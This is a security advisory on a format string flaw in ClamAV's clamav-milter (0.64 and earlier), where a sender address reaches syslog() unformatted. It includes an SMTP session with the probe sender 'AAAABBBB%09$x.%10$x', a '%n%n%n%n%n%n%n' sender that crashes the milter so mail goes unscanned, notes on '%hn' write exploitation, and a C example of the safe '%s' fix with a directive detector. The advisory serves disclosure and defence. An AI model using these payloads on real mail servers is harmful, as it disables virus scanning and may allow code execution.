Clam AntiVirus is "an anti-virus toolkit for UNIX. The main purpose of the software is to integrate with mail servers for attachment scanning. Clam Antivirus works with Linux, Solaris, FreeBSD, OpenBSD, NetBSD, AIX, Mac OS X, and Cygwin B20".
Snapshot clamav-devel-20031111 and clamav-0.65 fix a potentially exploitable format string issue that can be triggered by a remote attacker. Only versions above clamav-0.54 that include syslog() functionality are vulnerable to this attack. CVS snapshots up to but not including version clamav-devel-20031111 may be vulnerable to attack. Versions clamav-0.60 through clamav-0.60p are confirmed to be at least exploitable for a DoS condition. This issue only poses a problem for clamav-milter users.
Vulnerable systems:
* Clam AntiVirus version 0.64 and prior
Immune systems:
* Clam AntiVirus version 0.65
In order to exploit this condition clamav must be configured with syslog. Your clamav.conf must have the following setup:
# Use system logger (can work together with LogFile).
LogSyslog
clamd, clamav-milter and Sendmail must all be running.
[root@RiotStarter root]# ps -x| grep clam
6228 ? S 0:00 clamd
19118 ? S 0:00 clamav-milter -blo /var/run/clmilter.sock
In the event a virus rule is triggered the following code is run by clamav-milter. This code simply passes the sender's email address to syslog().
To see this bug in action, simply tail your maillog and use the example below.
[root@RiotStarter root]# tail -f /var/log/maillog
clamav-milter[]: stream: ClamAV-Test-Signature FOUND
...
clamav-milter[]: Intercepted virus from: AAAABBBB41414141.42424242 to: root
This message was caused by the following.
bash-2.05b$ nc localhost 25
220 localhost.localdomain ESMTP Sendmail 8.12.10/8.12.10; Wed, 12 Nov 2003 00:16:52 -0500
helo ClamAV_DoS_Potential_Exploit
250 localhost.localdomain Hello RiotStarter [127.0.0.1], pleased to meet you
mail from: AAAABBBB%09$x.%10$x
250 2.1.0 AAAABBBB%09$x.%10$x... Sender ok
rcpt to: root
250 2.1.5 root... Recipient ok
data
354 Enter mail, end with "." on a line by itself
$CEliacmaTrESTuScikgsn$FREE-TEST-SIGNATURE$EEEEE$
.
550 5.7.1 Virus detected by ClamAV - http://clamav.elektrapro.com
We made use of an antivirus test string in order to trigger the alert. This alert caused the from address to be passed directly to syslog() without any format specifier.
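The defect described above is the classic syslog(user_string) pattern; the added example below (not clamav-milter's own code) shows the safe construction of the "Intercepted virus from: ... to: ..." line with a fixed "%s" format, so that a sender such as AAAABBBB%09$x.%10$x is logged verbatim instead of interpreted, plus a small check that flags addresses carrying printf-style directives. The function names and the sample sender are constructed for illustration.

```c
#include <stdio.h>
#include <string.h>
#include <syslog.h>

/* Returns 1 if the string contains a printf-style directive ('%' not
 * immediately followed by another '%'), the ingredient an attacker-supplied
 * sender address needs to abuse syslog(user_string). Useful for flagging
 * such senders in maillog or at the MTA. */
int has_format_directive(const char *s)
{
    for (; *s != '\0'; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') {      /* "%%" is a literal percent sign */
            s++;
            continue;
        }
        return 1;               /* "%x", "%n", "%09$hn", trailing '%' ... */
    }
    return 0;
}

/* Builds the notice line the safe way: sender and recipient are arguments to
 * a fixed format, so "%09$x" inside the address is copied, not expanded.
 * The vulnerable form handed the assembled text to syslog() as the format:
 *     syslog(LOG_NOTICE, msg);          -- attacker text is the format
 * The fixed form is equivalent to:
 *     syslog(LOG_NOTICE, "%s", msg);    -- attacker text is only data
 * Returns the length of the generated line, or -1 if it did not fit. */
int format_virus_notice(char *out, size_t outlen, const char *from, const char *to)
{
    int n = snprintf(out, outlen, "Intercepted virus from: %s to: %s", from, to);
    if (n < 0 || (size_t)n >= outlen)
        return -1;
    return n;
}

/* Logs a detection; user-derived text never becomes the format argument. */
void log_virus_notice(const char *from, const char *to)
{
    char line[512];
    if (format_virus_notice(line, sizeof line, from, to) < 0)
        return;
    syslog(LOG_NOTICE, "%s", line);
}

int main(void)
{
    const char *from = "AAAABBBB%09$x.%10$x";   /* constructed sample sender */
    char line[512];
    printf("directive present: %d\n", has_format_directive(from));
    if (format_virus_notice(line, sizeof line, from, "root") > 0)
        printf("%s\n", line);
    return 0;
}
```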
This issue may potentially be used to run code as either the clamav user or root depending on how clamav is configured. At the very least a DoS attack on clamav-milter can be caused by using "mail from: %n%n%n%n%n%n%n".
Instead of "Virus detected by ClamAV..." you will see:
250 2.0.0 hAC5K2Y0019453 Message accepted for delivery
If you check the ps list you will note that clamav-milter is now dead.
From this point on messages are no longer being scanned by clamav. When attempting to exploit this issue an attacker must take care to use printable characters. Vanilla double write style exploitation may not be possible because of this. Popping items off the stack may still yield an interesting address to write to.
Upon writing an invalid address you will see something similar to the following (the address contains non-printable characters):
501 5.1.7 Syntax error in mailbox address "D'??F'??%09$hn.@10$hn"
Vendor Status:
Promptly attended to the issue. Patched clamav-milter is available in clamav-devel-20031111 and clamav-0.65